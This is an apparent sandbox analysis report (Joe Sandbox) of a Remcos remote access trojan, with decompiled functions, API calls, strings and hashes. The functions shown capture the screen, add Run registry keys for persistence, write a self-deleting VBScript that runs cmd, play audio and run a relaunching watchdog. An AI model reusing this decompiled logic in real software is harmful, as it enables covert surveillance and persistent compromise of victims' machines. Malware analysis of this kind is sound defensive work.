                                                                      										_t232 = _v156 - _v128.yHotspot - _v224;
                                                                      										__eflags = _t232;
                                                                      										DeleteObject(_v128.hbmColor);
                                                                      										DeleteObject(_v128.yHotspot);
                                                                      										DrawIcon(_t234, _v172.ptScreenPos - _v128.xHotspot - _v228, _t232, _v172);
                                                                      										_t219 = _v224;
                                                                      										_t223 = _v240;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							_push( &_v152);
                                                                      							_t120 = 0x18;
                                                                      							_t121 = GetObjectA(_t219, _t120, ??);
                                                                      							__eflags = _t121;
                                                                      							if(_t121 == 0) {
                                                                      								goto L7;
                                                                      							} else {
                                                                      								_t217 = _v146 * _v148 & 0x0000ffff;
                                                                      								__eflags = _t217 - 1;
                                                                      								if(_t217 != 1) {
                                                                      									_push(4);
                                                                      									_pop(1);
                                                                      									_v252 = 1;
                                                                      									__eflags = _t217 - 1;
                                                                      									if(_t217 <= 1) {
                                                                      										L24:
                                                                      										__eflags = 1 << 1;
                                                                      										_push(0x2eb6edc);
                                                                      										L25:
                                                                      										_t225 = LocalAlloc(0x40, ??);
                                                                      										_t196 = 0x18;
                                                                      										_t225->bmiHeader = 0x28;
                                                                      										_t225->bmiHeader.biWidth = _v172.ptScreenPos;
                                                                      										_t225->bmiHeader.biHeight = _v156;
                                                                      										_t225->bmiHeader.biPlanes = _v148;
                                                                      										_t225->bmiHeader.biBitCount = _v146;
                                                                      										_t133 = _v252;
                                                                      										__eflags = _t133 - _t196;
                                                                      										if(_t133 < _t196) {
                                                                      											__eflags = 1;
                                                                      											_t225->bmiHeader.biClrUsed = 1 << _t133;
                                                                      										}
                                                                      										_t225->bmiHeader.biCompression = _t225->bmiHeader.biCompression & 0x00000000;
                                                                      										_t225->bmiHeader.biClrImportant = _t225->bmiHeader.biClrImportant & 0x00000000;
                                                                      										asm("cdq");
                                                                      										_t216 = _t217 & 0x00000007;
                                                                      										_t139 = (_t225->bmiHeader.biWidth + 7 + (_t217 & 0x00000007) >> 3) * (_v252 & 0x0000ffff) * _t225->bmiHeader.biHeight;
                                                                      										_t225->bmiHeader.biSizeImage = _t139;
                                                                      										_t140 = GlobalAlloc(0, _t139);
                                                                      										_v252 = _t140;
                                                                      										__eflags = _t140;
                                                                      										if(_t140 != 0) {
                                                                      											_t142 = GetDIBits(_t234, _t219, 0, _t225->bmiHeader.biHeight & 0x0000ffff, _t140, _t225, 0);
                                                                      											__eflags = _t142;
                                                                      											if(_t142 != 0) {
                                                                      												_v252 = 0x4d42;
                                                                      												_v250 = _t225->bmiHeader + _t225->bmiHeader.biSizeImage + _t225->bmiHeader.biClrUsed * 4 + 0xe;
                                                                      												_v246 = 0;
                                                                      												_t150 = _t225->bmiHeader + _t225->bmiHeader.biClrUsed * 4 + 0xe;
                                                                      												__eflags = _t150;
                                                                      												_v242 = _t150;
                                                                      												E0040209F(_t187,  &_v236);
                                                                      												E0040209F(_t187,  &_v148);
                                                                      												E004024CA(_t187,  &_v236, _t216, __eflags,  &_v252, 0xe);
                                                                      												L00403336( &_v244);
                                                                      												E004024CA(_t187,  &_v248, _t216, __eflags, _t225, 0x28);
                                                                      												L00403336( &_v256);
                                                                      												_t226 = _v304;
                                                                      												E004024CA(_t187,  &_v260, _t216, __eflags, _t226, _t225->bmiHeader.biSizeImage);
                                                                      												L00403336( &_v268);
                                                                      												DeleteObject(_t219);
                                                                      												GlobalFree(_t226);
                                                                      												DeleteDC(_v312);
                                                                      												DeleteDC(_t234);
                                                                      												E00402015(_t187, _t187, _t234, __eflags,  &_v196);
                                                                      												E00401F98();
                                                                      												E00401F98();
                                                                      												goto L32;
                                                                      											}
                                                                      											DeleteDC(_v272);
                                                                      											DeleteDC(_t234);
                                                                      											DeleteObject(_t219);
                                                                      											GlobalFree(_v292);
                                                                      											goto L2;
                                                                      										} else {
                                                                      											DeleteDC(_v244);
                                                                      											L8:
                                                                      											DeleteDC(_t234);
                                                                      											DeleteObject(_t219);
                                                                      											goto L5;
                                                                      										}
                                                                      									}
                                                                      									_push(8);
                                                                      									_pop(1);
                                                                      									_v252 = 1;
                                                                      									__eflags = _t217 - 1;
                                                                      									if(_t217 <= 1) {
                                                                      										goto L24;
                                                                      									}
                                                                      									_push(0x10);
                                                                      									_pop(1);
                                                                      									_v252 = 1;
                                                                      									__eflags = _t217 - 1;
                                                                      									if(_t217 <= 1) {
                                                                      										goto L24;
                                                                      									}
                                                                      									_t215 = 0x18;
                                                                      									__eflags = _t217 - _t215;
                                                                      									if(_t217 > _t215) {
                                                                      										_push(0x20);
                                                                      										_pop(1);
                                                                      										L23:
                                                                      										_v252 = 1;
                                                                      										goto L24;
                                                                      									}
                                                                      									_v252 = _t215;
                                                                      									_push(0x28);
                                                                      									goto L25;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      						}
                                                                      						L7:
                                                                      						DeleteDC(_t223);
                                                                      						goto L8;
                                                                      					} else {
                                                                      						DeleteDC(_t223);
                                                                      						DeleteDC(_t234);
                                                                      						DeleteObject(_t219);
                                                                      						L5:
                                                                      						goto L2;
                                                                      					}
                                                                      				} else {
                                                                      					L2:
                                                                      					E00402053(_t187, _t187, _t216, _t234, 0x461084);
                                                                      					L32:
                                                                      					return _t187;
                                                                      				}
                                                                      			}
                                                                      0x0041578f
                                                                      0x0041579b
                                                                      0x004157a7
                                                                      0x004157af
                                                                      0x004157b2
                                                                      0x004157c3
                                                                      0x004157d1
                                                                      0x004157da
                                                                      0x004157e5
                                                                      0x004157ea
                                                                      0x004157f0
                                                                      0x00415810
                                                                      0x00415812
                                                                      0x00415816
                                                                      0x00415818
                                                                      0x00415831
                                                                      0x00415837
                                                                      0x00415839
                                                                      0x00415851
                                                                      0x00415855
                                                                      0x0041585a
                                                                      0x00415866
                                                                      0x0041588a
                                                                      0x00415890
                                                                      0x00415892
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415894
                                                                      0x00415899
                                                                      0x0041589f
                                                                      0x004158a8
                                                                      0x004158ae
                                                                      0x004158b0
                                                                      0x004158be
                                                                      0x004158c4
                                                                      0x004158c6
                                                                      0x004158e9
                                                                      0x004158e9
                                                                      0x004158ed
                                                                      0x004158fa
                                                                      0x00415907
                                                                      0x0041590d
                                                                      0x00415911
                                                                      0x00415911
                                                                      0x004158c6
                                                                      0x004158b0
                                                                      0x00415919
                                                                      0x0041591c
                                                                      0x0041591f
                                                                      0x00415925
                                                                      0x00415927
                                                                      0x00000000
                                                                      0x0041592d
                                                                      0x00415936
                                                                      0x0041593c
                                                                      0x0041593f
                                                                      0x00415945
                                                                      0x00415947
                                                                      0x00415948
                                                                      0x0041594c
                                                                      0x0041594f
                                                                      0x00415980
                                                                      0x00415980
                                                                      0x00415989
                                                                      0x0041598a
                                                                      0x00415992
                                                                      0x00415996
                                                                      0x00415997
                                                                      0x004159a1

                                                                      APIs
                                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004157A9
                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 004157B6
                                                                        • Part of subcall function 00415BE5: GetMonitorInfoW.USER32(?,?), ref: 00415C05
                                                                        • Part of subcall function 00415C2F: GetMonitorInfoW.USER32(?,?), ref: 00415C4F
                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 0041580A
                                                                      • DeleteDC.GDI32(00000000), ref: 00415821
                                                                      • DeleteDC.GDI32(00000000), ref: 00415824
                                                                      • DeleteObject.GDI32(00000000), ref: 00415827
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00415831
                                                                      • DeleteDC.GDI32(00000000), ref: 00415842
                                                                      • DeleteDC.GDI32(00000000), ref: 00415845
                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 0041588A
                                                                      • GetCursorInfo.USER32(?), ref: 004158A8
                                                                      • GetIconInfo.USER32(?,?), ref: 004158BE
                                                                      • DeleteObject.GDI32(?), ref: 004158ED
                                                                      • DeleteObject.GDI32(?), ref: 004158FA
                                                                      • DrawIcon.USER32 ref: 00415907
                                                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 0041591F
                                                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 0041598C
                                                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 004159FB
                                                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00415A1F
                                                                      • DeleteDC.GDI32(?), ref: 00415A33
                                                                      • DeleteDC.GDI32(00000000), ref: 00415A36
                                                                      • DeleteObject.GDI32(00000000), ref: 00415A39
                                                                      • GlobalFree.KERNEL32 ref: 00415A44
                                                                      • DeleteObject.GDI32(00000000), ref: 00415AF8
                                                                      • GlobalFree.KERNEL32 ref: 00415AFF
                                                                      • DeleteDC.GDI32(?), ref: 00415B0F
                                                                      • DeleteDC.GDI32(00000000), ref: 00415B12
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
                                                                      • String ID: DISPLAY
                                                                      • API String ID: 517350757-865373369
                                                                      • Opcode ID: 03c8cb86559e5b9e8e0ee65dbb47f0ea93f3a5bd1830207cf3364575eb27ddeb
                                                                      • Instruction ID: c91569fff03eade9eee0c78440e7041a36cc381d21532e3a74c7778e484bb87e
                                                                      • Opcode Fuzzy Hash: 03c8cb86559e5b9e8e0ee65dbb47f0ea93f3a5bd1830207cf3364575eb27ddeb
                                                                      • Instruction Fuzzy Hash: 49B15D71508705DFC320EF61D844BABBBE8EB84715F10482EFA8997291DB34E944CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E0040B256(void* __edx, void* _a4) {
                                                                      				char _v0;
                                                                      				short _v524;
                                                                      				char _v548;
                                                                      				void* _v560;
                                                                      				char _v576;
                                                                      				void* _v584;
                                                                      				char _v596;
                                                                      				char _v600;
                                                                      				char _v612;
                                                                      				char _v620;
                                                                      				char _v624;
                                                                      				char _v628;
                                                                      				void* _v632;
                                                                      				char _v644;
                                                                      				char _v648;
                                                                      				char _v652;
                                                                      				void* _v656;
                                                                      				char _v668;
                                                                      				char _v672;
                                                                      				char _v676;
                                                                      				void* _v680;
                                                                      				char _v692;
                                                                      				void* _v696;
                                                                      				char _v700;
                                                                      				char _v704;
                                                                      				char _v708;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				void* _t53;
                                                                      				void* _t54;
                                                                      				void* _t57;
                                                                      				signed int _t61;
                                                                      				void* _t62;
                                                                      				void* _t67;
                                                                      				void* _t78;
                                                                      				void* _t79;
                                                                      				void* _t92;
                                                                      				void* _t93;
                                                                      				signed char _t134;
                                                                      				void* _t213;
                                                                      				void* _t244;
                                                                      				void* _t246;
                                                                      				void* _t247;
                                                                      				void* _t248;
                                                                      
                                                                      				_t213 = __edx;
                                                                      				E0041030A();
                                                                      				if( *0x46c9c4 != 0x30) {
                                                                      					E00409F34();
                                                                      				}
                                                                      				_t244 =  *0x46dd5b - 1; // 0x0
                                                                      				if(_t244 == 0) {
                                                                      					E0041628E(_t213, _t244);
                                                                      				}
                                                                      				if( *0x46da75 != 0) {
                                                                      					E004187B1(E00401EC4(0x46e0d8), _t213);
                                                                      				}
                                                                      				_t230 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                                                      				_t246 =  *0x46daf7 - 1; // 0x1
                                                                      				if(_t246 == 0) {
                                                                      					E00410F97(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EC4(0x46e570));
                                                                      				}
                                                                      				_t247 =  *0x46daf4 - 1; // 0x0
                                                                      				if(_t247 == 0) {
                                                                      					E00410F97(0x80000002, _t230, E00401EC4(0x46e570));
                                                                      				}
                                                                      				_t248 =  *0x46daf5 - 1; // 0x0
                                                                      				if(_t248 == 0) {
                                                                      					E00410F97(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EC4(0x46e570));
                                                                      				}
                                                                      				_t53 = E0040243C();
                                                                      				_t54 = E00401F6B(0x46e5e8);
                                                                      				_t57 = E00410C6B(E00401F6B(0x46e5a0), "exepath",  &_v524, 0x208, _t54, _t53);
                                                                      				_t249 = _t57;
                                                                      				if(_t57 == 0) {
                                                                      					GetModuleFileNameW(0,  &_v524, 0x208);
                                                                      				}
                                                                      				RegDeleteKeyA(0x80000001, E00401F6B(0x46e5a0));
                                                                      				_t61 = SetFileAttributesW( &_v524, 0x80);
                                                                      				_t140 = 0x46e5b8;
                                                                      				asm("sbb bl, bl");
                                                                      				_t134 =  ~_t61 & 0x00000001;
                                                                      				_t62 = E004078C9(_t249);
                                                                      				_t250 = _t62;
                                                                      				if(_t62 != 0) {
                                                                      					_t140 = 0x46e5b8;
                                                                      					SetFileAttributesW(E00401EC4(0x46e5b8), 0x80);
                                                                      				}
                                                                      				E00402FD4(_t134,  &_v600, E0040413E(_t134,  &_v668, 0x4610ec, 0x4610ec, E00438A0F(_t134, _t140, _t250, L"Temp")), 0, 0x4610ec, _t250, L"\\update.vbs");
                                                                      				E00401EC9();
                                                                      				_t67 = E0040413E(_t134,  &_v672, _t64, 0x4610ec, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                                                                      				_t217 = L"On Error Resume Next\n";
                                                                      				E004042BC(_t134,  &_v700, L"On Error Resume Next\n", 0x4610ec, _t250, _t67);
                                                                      				E00401EC9();
                                                                      				_t251 = _t134;
                                                                      				if(_t134 != 0) {
                                                                      					_t217 = E004042BC(_t134,  &_v648, L"while fso.FileExists(\"", 0x4610ec, _t251, E0040413E(_t134,  &_v620, L"On Error Resume Next\n", 0x4610ec,  &_v524));
                                                                      					E0040321D(E00402FD4(_t134,  &_v672, _t109, 0, 0x4610ec, _t251, L"\")\n"));
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      				}
                                                                      				_t236 = L"\"\n";
                                                                      				E0040321D(E00402FD4(_t134,  &_v624, E00402FD4(_t134,  &_v648, E0040413E(_t134,  &_v668, _t217, 0x4610ec, L"fso.DeleteFile \""), 0, 0x4610ec, _t251,  &_v524), 0, 0x4610ec, _t251, L"\"\n"));
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				_t252 = _t134;
                                                                      				if(_t134 != 0) {
                                                                      					L00407735(_t134,  &_v692, 0, 0x4610ec, L"wend\n");
                                                                      				}
                                                                      				_t220 = 0x4610ec;
                                                                      				_t78 = E004078C9(_t252);
                                                                      				_t253 = _t78;
                                                                      				if(_t78 != 0) {
                                                                      					_t220 = E0040A01F( &_v644, L"fso.DeleteFolder \"", 0x4610ec, 0x46e5b8);
                                                                      					E0040321D(E00402FD4(0x46e5b8,  &_v620, _t101, 0, 0x4610ec, _t253, _t236));
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      				}
                                                                      				_t79 = E0040413E(0x46e5b8,  &_v548, _t220, 0x4610ec, L"\"\"\", 0");
                                                                      				E0040321D(E00402FD4(0x46e5b8,  &_v628, E00402F65( &_v652, E004042DD(0x46e5b8,  &_v676, E0040413E(0x46e5b8,  &_v576, _t220, 0x4610ec, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0x4610ec, _t253,  &_v0), _t79), 0, 0x4610ec, _t253, "\n"));
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				L00407735(0x46e5b8,  &_v704, 0, 0x4610ec, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                      				_t92 = E00401EC4( &_v612);
                                                                      				_t93 = E0040243C();
                                                                      				E00401EC4( &_v708);
                                                                      				if(E00418911(_t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401EC4( &_v596), 0x4610ec, 0x4610ec, 0) > 0x20) {
                                                                      					ExitProcess(0);
                                                                      				}
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				return E00401EC9();
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 0041030A: TerminateProcess.KERNEL32(00000000,0046E588,0040D393), ref: 0041031A
                                                                        • Part of subcall function 0041030A: WaitForSingleObject.KERNEL32(000000FF), ref: 0041032D
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B34E
                                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B361
                                                                      • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B37A
                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B3AA
                                                                        • Part of subcall function 00409F34: TerminateThread.KERNEL32(Function_00008A37,00000000,0046E588,0040AEEE,?,0046E5A0,pth_unenc,0046E588), ref: 00409F43
                                                                        • Part of subcall function 00409F34: UnhookWindowsHookEx.USER32(0025013B), ref: 00409F53
                                                                        • Part of subcall function 00409F34: TerminateThread.KERNEL32(Function_00008A21,00000000,?,0046E5A0,pth_unenc,0046E588), ref: 00409F65
                                                                        • Part of subcall function 00418911: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,00418A34,00000000,00000000,00000000), ref: 00418950
                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,004610EC,004610EC,00000000), ref: 0040B5F5
                                                                      • ExitProcess.KERNEL32 ref: 0040B601
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                      • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                      • API String ID: 1861856835-219127200
                                                                      • Opcode ID: 14a662654b977d7ec31285f1b04a17553a86ffabf4cdfa494283df12be9bb35b
                                                                      • Instruction ID: 871c8e1d6bde0fadc417a5a0982cbad285edf7ac094e03f293d7e5e2671dfa19
                                                                      • Opcode Fuzzy Hash: 14a662654b977d7ec31285f1b04a17553a86ffabf4cdfa494283df12be9bb35b
                                                                      • Instruction Fuzzy Hash: 5591AF716182405AC318F762DC62AAF77E89F90309F54043FF446A31E2EE7C9D4AC69E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E004178D4(void* __ecx, void* __edx, char _a4) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				char _v76;
                                                                      				char _v100;
                                                                      				char _v124;
                                                                      				void* _v128;
                                                                      				char _v176;
                                                                      				char _v192;
                                                                      				void* _v216;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t23;
                                                                      				void* _t26;
                                                                      				void* _t41;
                                                                      				long _t45;
                                                                      				void* _t59;
                                                                      				void* _t62;
                                                                      				void* _t66;
                                                                      				void* _t109;
                                                                      				void* _t111;
                                                                      				void* _t114;
                                                                      				void* _t116;
                                                                      				void* _t120;
                                                                      
                                                                      				_t103 = __edx;
                                                                      				_t116 =  &_v124;
                                                                      				_t66 = __ecx;
                                                                      				_t109 = __edx;
                                                                      				if(E00417B37( &_a4, __ecx, __ecx) == 0xffffffff) {
                                                                      					_t62 = E00401EC4( &_a4);
                                                                      					_t103 = 0x30;
                                                                      					E00401ED3( &_a4, 0x30, _t111, E0041905E( &_v124, 0x30, _t62));
                                                                      					E00401EC9();
                                                                      				}
                                                                      				_t23 = E0040243C();
                                                                      				_t122 = _t23;
                                                                      				if(_t23 == 0) {
                                                                      					__eflags = PathFileExistsW(E00401EC4( &_a4));
                                                                      					if(__eflags != 0) {
                                                                      						goto L4;
                                                                      					} else {
                                                                      						E00402053(_t66, _t116 - 0x18, _t103, _t114, 0x461084);
                                                                      						_push(0xa8);
                                                                      						E00404A78(0x46ec30, _t103, __eflags);
                                                                      					}
                                                                      				} else {
                                                                      					_t59 = E00401EC4( &_a4);
                                                                      					_t120 = _t116 - 0x18;
                                                                      					E004020B6(_t66, _t120, _t103, _t122, _t109);
                                                                      					E00418A12(_t59);
                                                                      					_t116 = _t120 + 0x18;
                                                                      					L4:
                                                                      					_t26 = E00418385( &_v28, _t66);
                                                                      					_t108 = E00402F65( &_v124, E00402FD4(_t66,  &_v76, E0040A01F( &_v52, L"open \"", _t114,  &_a4), _t109, _t114, _t122, L"\" type "), _t26);
                                                                      					E00402FD4(_t66,  &_v100, _t30, _t109, _t114, _t122, L" alias audio");
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					E00401EC9();
                                                                      					mciSendStringW(E00401EC4( &_v100), 0, 0, 0);
                                                                      					mciSendStringA("play audio", 0, 0, 0);
                                                                      					_t117 = _t116 - 0x18;
                                                                      					E00402053(0, _t116 - 0x18, _t30, _t114, 0x461084);
                                                                      					_push(0xa9);
                                                                      					E00404A78(0x46ec30, _t30, 0);
                                                                      					_t41 = CreateEventA(0, 1, 0, 0);
                                                                      					while(1) {
                                                                      						L5:
                                                                      						 *0x46de9c = _t41;
                                                                      						while(1) {
                                                                      							_t124 = _t41;
                                                                      							if(_t41 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							__eflags =  *0x46de9a; // 0x0
                                                                      							if(__eflags != 0) {
                                                                      								mciSendStringA("pause audio", 0, 0, 0);
                                                                      								 *0x46de9a = 0;
                                                                      							}
                                                                      							__eflags =  *0x46de99; // 0x0
                                                                      							if(__eflags != 0) {
                                                                      								mciSendStringA("resume audio", 0, 0, 0);
                                                                      								 *0x46de99 = 0;
                                                                      							}
                                                                      							mciSendStringA("status audio mode",  &_v176, 0x14, 0);
                                                                      							_t45 = E00438EB0( &_v192, "stopped");
                                                                      							__eflags = _t45;
                                                                      							if(_t45 == 0) {
                                                                      								SetEvent( *0x46de9c);
                                                                      							}
                                                                      							__eflags = WaitForSingleObject( *0x46de9c, 0x1f4);
                                                                      							if(__eflags != 0) {
                                                                      								_t41 =  *0x46de9c; // 0x0
                                                                      							} else {
                                                                      								CloseHandle( *0x46de9c);
                                                                      								_t41 = 0;
                                                                      								goto L5;
                                                                      							}
                                                                      						}
                                                                      						mciSendStringA("stop audio", 0, 0, 0);
                                                                      						mciSendStringA("close audio", 0, 0, 0);
                                                                      						E00402053(0, _t117 - 0x18, _t108, 0x46ec30, 0x461084);
                                                                      						_push(0xaa);
                                                                      						E00404A78(0x46ec30, _t108, _t124);
                                                                      						E00401EC9();
                                                                      						goto L19;
                                                                      					}
                                                                      				}
                                                                      				L19:
                                                                      				return E00401EC9();
                                                                      			}

                                                                      APIs
                                                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004179D7
                                                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 004179EB
                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00461084), ref: 00417A13
                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,0046E260,00000000), ref: 00417A29
                                                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00417A6A
                                                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00417A82
                                                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00417A97
                                                                      • SetEvent.KERNEL32 ref: 00417AB4
                                                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 00417AC5
                                                                      • CloseHandle.KERNEL32 ref: 00417AD5
                                                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00417AF7
                                                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00417B01
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                      • String ID: alias audio$" type $`F$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                      • API String ID: 738084811-4026724951
                                                                      • Opcode ID: 347a97de2a33badba23eb7f922f2683029b76ac921bbc2536f08d17a06bb18f9
                                                                      • Instruction ID: 8692a01f65d0cc53f57fd209159479e10e637190834e875ef2e68fc076a3909c
                                                                      • Opcode Fuzzy Hash: 347a97de2a33badba23eb7f922f2683029b76ac921bbc2536f08d17a06bb18f9
                                                                      • Instruction Fuzzy Hash: 4D51D1717182046ED214B732EC96EAF3BAC9B9038DF10043FF506661E2EE794D49866F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0040FF45() {
                                                                      				long _v8;
                                                                      				char _v32;
                                                                      				short _v556;
                                                                      				short _v1076;
                                                                      				short _v1596;
                                                                      				short _v2116;
                                                                      				void* _t27;
                                                                      				void* _t28;
                                                                      				void* _t31;
                                                                      				long _t37;
                                                                      				int _t41;
                                                                      				long _t50;
                                                                      				void* _t55;
                                                                      				void* _t68;
                                                                      				void* _t70;
                                                                      				int _t71;
                                                                      				void* _t72;
                                                                      				long _t73;
                                                                      				void* _t110;
                                                                      				void* _t112;
                                                                      				void* _t115;
                                                                      				void* _t116;
                                                                      
                                                                      				_t71 = 0;
                                                                      				_v8 = _t73;
                                                                      				CreateMutexA(0, 1, "Mutex_RemWatchdog");
                                                                      				GetModuleFileNameW(0,  &_v2116, 0x104);
                                                                      				_t27 = E0040243C();
                                                                      				_t28 = E00401F6B(0x46e5e8);
                                                                      				_t108 = 0x46e5a0;
                                                                      				_t31 = E00410C6B(E00401F6B(0x46e5a0), "exepath",  &_v556, 0x208, _t28, _t27);
                                                                      				_t116 = _t115 + 0x14;
                                                                      				if(_t31 != 0) {
                                                                      					E0040209F(0,  &_v32);
                                                                      					if(E004189A5( &_v32) == 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t110 = OpenProcess(0x100000, 0, _v8);
                                                                      					WaitForSingleObject(_t110, 0xffffffff);
                                                                      					CloseHandle(_t110);
                                                                      					_t37 = GetCurrentProcessId();
                                                                      					if(E00410DEB(0x46e5a0, E00401F6B(0x46e5a0), "WDH", _t37) == 0) {
                                                                      						L18:
                                                                      						ExitProcess(1);
                                                                      						L2:
                                                                      					}
                                                                      					_t108 = ShellExecuteW;
                                                                      					do {
                                                                      						_t41 = PathFileExistsW( &_v556);
                                                                      						_t42 =  &_v556;
                                                                      						if(_t41 != 0) {
                                                                      							L11:
                                                                      							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
                                                                      							L12:
                                                                      							do {
                                                                      								_t72 = E00410AC0(E00401F6B(0x46e5a0), "WD",  &_v8);
                                                                      								_t122 = _t72;
                                                                      								if(_t72 == 0) {
                                                                      									Sleep(0x1f4);
                                                                      								} else {
                                                                      									E00410F1D(E00401F6B(0x46e5a0), _t122, "WD");
                                                                      								}
                                                                      							} while (_t72 == 0);
                                                                      							goto L17;
                                                                      						}
                                                                      						_t55 = E0040243C();
                                                                      						E00401F6B( &_v32);
                                                                      						if(E00418911(_t55,  &_v556, _t71) == 0) {
                                                                      							E004337A0(_t108,  &_v1596, _t71, 0x208);
                                                                      							_t116 = _t116 + 0xc;
                                                                      							GetTempPathW(0x104,  &_v1596);
                                                                      							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
                                                                      							lstrcatW( &_v1076, L".exe");
                                                                      							_t68 = E0040243C();
                                                                      							E00401F6B( &_v32);
                                                                      							_t70 = E00418911(_t68,  &_v1076, _t71);
                                                                      							__eflags = _t70;
                                                                      							if(_t70 == 0) {
                                                                      								goto L12;
                                                                      							}
                                                                      							_t42 =  &_v1076;
                                                                      							goto L11;
                                                                      						}
                                                                      						_t42 =  &_v556;
                                                                      						goto L11;
                                                                      						L17:
                                                                      						_t71 = 0;
                                                                      						_t112 = OpenProcess(0x100000, 0, _v8);
                                                                      						WaitForSingleObject(_t112, 0xffffffff);
                                                                      						CloseHandle(_t112);
                                                                      						_t50 = GetCurrentProcessId();
                                                                      					} while (E00410DEB(0x46e5a0, E00401F6B(0x46e5a0), "WDH", _t50) != 0);
                                                                      					goto L18;
                                                                      				}
                                                                      				L1:
                                                                      				ExitProcess(_t71);
                                                                      				goto L2;
                                                                      			}

                                                                      APIs
                                                                      • CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0046E600,0046E5A0,00000000), ref: 0040FF5E
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040FF71
